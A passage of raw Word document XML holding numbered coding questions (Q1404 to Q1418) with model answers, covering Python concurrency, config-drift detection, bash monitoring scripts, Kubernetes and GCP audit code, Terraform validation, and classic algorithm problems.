        <w:t>A: from concurrent.futures import ThreadPoolExecutor, as_completed</w:t>
        <w:br/>
        <w:t>def process_resources(resources, process_fn, max_workers=10):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    results, errors = [], []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with ThreadPoolExecutor(max_workers=max_workers) as executor:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        futures = {executor.submit(process_fn, r): r for r in resources}</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for future in as_completed(futures):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            resource = futures[future]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                results.append(future.result())</w:t>
        <w:br/>
        <w:t xml:space="preserve">            except Exception as e:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                errors.append((resource, str(e)))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return {'results': results, 'errors': errors}</w:t>
        <w:br/>
        <w:t>The worker count is bounded by max_workers, and per-item exceptions are caught individually via future.result() so one failing resource does not stop the batch or get silently lost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1404. Python coding: Write a function that detects configuration drift between two nested dictionaries while ignoring approved keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def detect_drift(desired, actual, ignore_keys=frozenset()):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    drift = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    keys = set(desired) | set(actual)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for key in keys:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if key in ignore_keys:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        d, a = desired.get(key), actual.get(key)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if isinstance(d, dict) and isinstance(a, dict):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            nested = detect_drift(d, a, ignore_keys)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if nested:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                drift[key] = nested</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif d != a:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            drift[key] = {'desired': d, 'actual': a}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return drift</w:t>
        <w:br/>
        <w:t>Recurses into nested dicts so drift is reported at the deepest differing key rather than flagging an entire parent object as changed, and ignore_keys is passed through recursive calls consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1405. Bash coding: Write a script that exits non-zero when disk usage exceeds a threshold and prints the five largest directories safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: #!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>THRESHOLD=${1:-90}</w:t>
        <w:br/>
        <w:t>USAGE=$(df --output=pcent / | tail -1 | tr -dc '0-9')</w:t>
        <w:br/>
        <w:t>if [ "$USAGE" -gt "$THRESHOLD" ]; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Disk usage ${USAGE}% exceeds threshold ${THRESHOLD}%" &gt;&amp;2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  du -h --max-depth=2 / 2&gt;/dev/null | sort -rh | head -5</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exit 1</w:t>
        <w:br/>
        <w:t>fi</w:t>
        <w:br/>
        <w:t>echo "OK: ${USAGE}%"</w:t>
        <w:br/>
        <w:t>`set -euo pipefail` fails fast on errors, unset variables, and pipeline failures; `du` errors are redirected to /dev/null so permission-denied directories don't pollute output, and `sort -rh` handles human-readable sizes correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1406. Bash coding: Write a script that checks an HTTP endpoint with timeout and retries, then emits a machine-readable health result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: #!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>URL=$1</w:t>
        <w:br/>
        <w:t>for attempt in 1 2 3; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  CODE=$(curl -s -o /dev/null -w '%{http_code}' -m 5 "$URL" || echo 000)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if [ "$CODE" = "200" ]; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">    echo "{\"url\":\"$URL\",\"status\":\"healthy\",\"http_code\":$CODE,\"attempt\":$attempt}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    exit 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fi</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sleep $((attempt * 2))</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:t>echo "{\"url\":\"$URL\",\"status\":\"unhealthy\",\"http_code\":$CODE,\"attempt\":$attempt}"</w:t>
        <w:br/>
        <w:t>exit 1</w:t>
        <w:br/>
        <w:t>curl's -m sets a per-attempt timeout, `|| echo 000` prevents curl's non-zero exit from killing the script under set -e, and output is valid JSON so it plugs directly into a monitoring pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1407. Kubernetes coding: Write a Python program using the Kubernetes client that lists unschedulable pods and summarizes their scheduling reasons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from kubernetes import client, config</w:t>
        <w:br/>
        <w:t>config.load_kube_config()</w:t>
        <w:br/>
        <w:t>v1 = client.CoreV1Api()</w:t>
        <w:br/>
        <w:t>def unschedulable_pods():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    summary = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for pod in v1.list_pod_for_all_namespaces().items:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for cond in pod.status.conditions or []:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if cond.type == 'PodScheduled' and cond.status == 'False':</w:t>
        <w:br/>
        <w:t xml:space="preserve">                reason = cond.reason or 'Unknown'</w:t>
        <w:br/>
        <w:t xml:space="preserve">                summary[reason] = summary.get(reason, 0) + 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return summary</w:t>
        <w:br/>
        <w:t>This checks the PodScheduled condition specifically (status False means scheduling failed) rather than just phase == 'Pending', and tallies by reason (e.g. Unschedulable due to insufficient resources) so common bottlenecks are visible at a glance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1408. GCP coding: Write a Python program using Google Cloud client libraries that lists public Cloud Storage buckets and handles permission errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from google.cloud import storage</w:t>
        <w:br/>
        <w:t>from google.api_core.exceptions import Forbidden</w:t>
        <w:br/>
        <w:t>def find_public_buckets(project_id):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    client = storage.Client(project=project_id)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    public_buckets = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for bucket in client.list_buckets():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            policy = bucket.get_iam_policy(requested_policy_version=3)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            for binding in policy.bindings:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                if 'allUsers' in binding.get('members', []) or 'allAuthenticatedUsers' in binding.get('members', []):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    public_buckets.append(bucket.name)</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    break</w:t>
        <w:br/>
        <w:t xml:space="preserve">        except Forbidden:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return public_buckets</w:t>
        <w:br/>
        <w:t>Checks IAM bindings for allUsers/allAuthenticatedUsers members rather than assuming public ACLs, and catches Forbidden explicitly so one bucket without permission does not crash the whole scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1409. Terraform coding: Write a validation strategy or test that rejects resources missing required labels and prevents public ingress on port 22.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: variable "labels" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type = map(string)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  validation {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    condition     = contains(keys(var.labels), "owner") &amp;&amp; contains(keys(var.labels), "env")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    error_message = "labels must include 'owner' and 'env'."</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>resource "google_compute_firewall" "deny_ssh_public" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  count = anytrue([for r in var.source_ranges : r == "0.0.0.0/0"]) &amp;&amp; contains(var.allowed_ports, "22") ? 1 : 0</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Use a Terraform `validation` block on the variable to fail plan/apply immediately if required labels are missing, and combine that with an OPA/Sentinel policy-as-code check in CI that scans the plan JSON to hard-block any security group or firewall rule allowing 0.0.0.0/0 on port 22 before it ever reaches apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1410. Coding: Array Operations — Final Array. Given an even-size array A (1&lt;=N&lt;=5000) and a string S of M operations (1&lt;=M&lt;=50, each 'A'=reverse whole array, 'L'=reverse left half, 'R'=reverse right half, 'S'=swap halves), implement getFinalArray(N, M, A, S) and print the resulting array after applying all M operations in order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def getFinalArray(N, M, A, S):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result = -404</w:t>
        <w:br/>
        <w:t xml:space="preserve">    half = N // 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for operation in S[:M]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if operation == "A":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            A.reverse()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif operation == "L":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            A[:half] = A[:half][::-1]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif operation == "R":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            A[half:] = A[half:][::-1]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif operation == "S":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            A = A[half:] + A[:half]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result = " ".join(map(str, A))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return result</w:t>
        <w:br/>
        <w:br/>
        <w:t>N, M = input().split()</w:t>
        <w:br/>
        <w:t>N = int(N)</w:t>
        <w:br/>
        <w:t>M = int(M)</w:t>
        <w:br/>
        <w:t>temp = input().split()</w:t>
        <w:br/>
        <w:t>A = [int(temp[i]) for i in range(N)]</w:t>
        <w:br/>
        <w:t>S = input().strip()</w:t>
        <w:br/>
        <w:t>print(getFinalArray(N, M, A, S))</w:t>
        <w:br/>
        <w:t>There are four operation types, not three: A (reverse whole array), L (reverse left half), R (reverse right half), S (swap halves). A solution that only handles L/R/S and skips 'A' will pass a test case that never exercises 'A' but fail others, e.g. sample input "4 4 / 1 2 3 4 / LRSR" -&gt; L: 2 1 3 4, R: 2 1 4 3, S: 4 3 2 1, R: 4 3 1 2 -&gt; output "4 3 1 2".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1411. Graph coding: Minimum Bottleneck Latency (Minimum Secure Path). Given n services and directed weighted edges [u, v, w], find a path from start to end where the path's cost is the maximum edge weight on it (the bottleneck), and return the minimum possible bottleneck over all paths. Return -1 if end is unreachable and 0 if start == end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import heapq</w:t>
        <w:br/>
        <w:br/>
        <w:t>def min_bottleneck_path(n, edges, start, end):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if start == end:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    graph = {i: [] for i in range(n)}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for u, v, w in edges:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        graph[u].append((v, w))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    dist = [float("inf")] * n</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dist[start] = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    pq = [(0, start)]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while pq:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        d, u = heapq.heappop(pq)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if d &gt; dist[u]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if u == end:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return d</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for v, w in graph[u]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            nd = max(d, w)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if nd &lt; dist[v]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                dist[v] = nd</w:t>
        <w:br/>
        <w:t xml:space="preserve">                heapq.heappush(pq, (nd, v))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return -1 if dist[end] == float("inf") else dist[end]</w:t>
        <w:br/>
        <w:t>This is a modified Dijkstra (minimax path): instead of summing edge weights, relax with max(current_bottleneck, edge_weight) and always pop the smallest bottleneck first from the heap. Runs in O((V + E) log V).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1412. Graph coding: Detect Circular Service Dependencies. Given n services and directed dependency edges [u, v] meaning u must be deployed before v, determine whether the dependency graph contains a cycle. Return true if a cycle exists, otherwise false.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from collections import deque, defaultdict</w:t>
        <w:br/>
        <w:br/>
        <w:t>def has_circular_dependency(n, edges):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    graph = defaultdict(list)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    indegree = [0] * n</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for u, v in edges:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        graph[u].append(v)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        indegree[v] += 1</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    queue = deque(i for i in range(n) if indegree[i] == 0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    processed = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while queue:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        u = queue.popleft()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        processed += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for v in graph[u]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            indegree[v] -= 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if indegree[v] == 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                queue.append(v)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    return processed &lt; n</w:t>
        <w:br/>
        <w:t>This is Kahn's algorithm / topological sort: repeatedly remove zero-indegree nodes. If fewer than n nodes get processed by the time the queue empties, the remaining nodes are stuck in a cycle. Runs in O(V + E).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1413. Coding: Median of Two Sorted Arrays. Given two sorted arrays nums1 and nums2 of size m and n, return the median of the two combined sorted arrays in O(log(m+n)) time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def findMedianSortedArrays(nums1, nums2):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if len(nums1) &gt; len(nums2):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        nums1, nums2 = nums2, nums1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    m, n = len(nums1), len(nums2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    lo, hi = 0, m</w:t>
        <w:br/>
        <w:t xml:space="preserve">    half = (m + n + 1) // 2</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    while lo &lt;= hi:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        i = (lo + hi) // 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">        j = half - i</w:t>
        <w:br/>
        <w:t xml:space="preserve">        left1 = nums1[i - 1] if i &gt; 0 else float("-inf")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        right1 = nums1[i] if i &lt; m else float("inf")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        left2 = nums2[j - 1] if j &gt; 0 else float("-inf")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        right2 = nums2[j] if j &lt; n else float("inf")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        if left1 &lt;= right2 and left2 &lt;= right1:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if (m + n) % 2 == 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return (max(left1, left2) + min(right1, right2)) / 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return float(max(left1, left2))</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif left1 &gt; right2:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            hi = i - 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            lo = i + 1</w:t>
        <w:br/>
        <w:t>Binary search on the smaller array for a partition index i (and the matching j = half - i on the other array) such that everything left of the partition is &lt;= everything right of it. That gives O(log(min(m, n))), which satisfies the O(log(m+n)) bound.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1414. Coding: Longest Palindromic Substring. Given a string s, return the longest substring of s that is a palindrome (e.g. "babad" -&gt; "bab" or "aba").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def longestPalindrome(s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not s:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    start, end = 0, 0</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def expand(l, r):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        while l &gt;= 0 and r &lt; len(s) and s[l] == s[r]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            l -= 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">            r += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return l + 1, r - 1</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    for i in range(len(s)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        l1, r1 = expand(i, i)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if r1 - l1 &gt; end - start:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            start, end = l1, r1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        l2, r2 = expand(i, i + 1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if r2 - l2 &gt; end - start:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            start, end = l2, r2</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    return s[start:end + 1]</w:t>
        <w:br/>
        <w:t>Expand-around-center: every palindrome has a center (a single character for odd length, a gap between two characters for even length), so try both center types at each index and keep the widest match. O(n^2) time, O(1) extra space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1415. Coding: Zigzag Conversion. Convert a string s into a zigzag pattern across numRows rows, then read it back row by row (e.g. "PAYPALISHIRING" with numRows=3 -&gt; "PAHNAPLSIIGYIR").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def convert(s, numRows):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if numRows == 1 or numRows &gt;= len(s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return s</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    rows = [""] * numRows</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cur_row = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    going_down = False</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    for c in s:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        rows[cur_row] += c</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if cur_row == 0 or cur_row == numRows - 1:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            going_down = not going_down</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cur_row += 1 if going_down else -1</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    return "".join(rows)</w:t>
        <w:br/>
        <w:t>Simulate the zigzag directly: walk down rows 0..numRows-1, bounce back up at the edges, appending each character to its current row's buffer, then concatenate all rows. O(n) time, O(n) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1416. DSA coding: Two Sum. Given an array of integers nums and an integer target, return the indices of the two numbers that add up to target, in O(n) time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def twoSum(nums, target):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    seen = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for i, n in enumerate(nums):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        complement = target - n</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if complement in seen:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return [seen[complement], i]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        seen[n] = i</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return []</w:t>
        <w:br/>
        <w:t>Single pass with a hash map from value to index: for each number, check whether its complement was already seen. O(n) time, O(n) space, versus O(n^2) for the brute-force double loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1417. DSA coding: Valid Parentheses. Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid (every bracket is closed by the same type in the correct order).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def isValid(s):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stack = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    pairs = {")": "(", "]": "[", "}": "{"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for c in s:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if c in "([{":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            stack.append(c)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        elif c in pairs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if not stack or stack.pop() != pairs[c]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return False</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return not stack</w:t>
        <w:br/>
        <w:t>Push opening brackets onto a stack; on a closing bracket, it must match the top of the stack (the most recent unmatched opener). If the stack is empty at a closing bracket, or non-empty at the end, the string is invalid. O(n) time, O(n) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1418. DSA coding: Reverse a Linked List. Given the head of a singly linked list, reverse it in place and return the new head.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: class ListNode:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def __init__(self, val=0, next=None):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.val = val</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.next = next</w:t>
        <w:br/>
        <w:br/>
        <w:t>def reverseList(head):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    prev = None</w:t>
        <w:br/>
        <w:t xml:space="preserve">    while head:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        nxt = head.next</w:t>
        <w:br/>
        <w:t xml:space="preserve">        head.next = prev</w:t>
        <w:br/>
        <w:t xml:space="preserve">        prev = head</w:t>
        <w:br/>
        <w:t xml:space="preserve">        head = nxt</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return prev</w:t>
        <w:br/>
        <w:t>Iterative pointer-reversal: at each node, save the next node before overwriting head.next to point backwards, then advance both prev and head. O(n) time, O(1) extra space (versus O(n) call-stack space for a recursive version).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
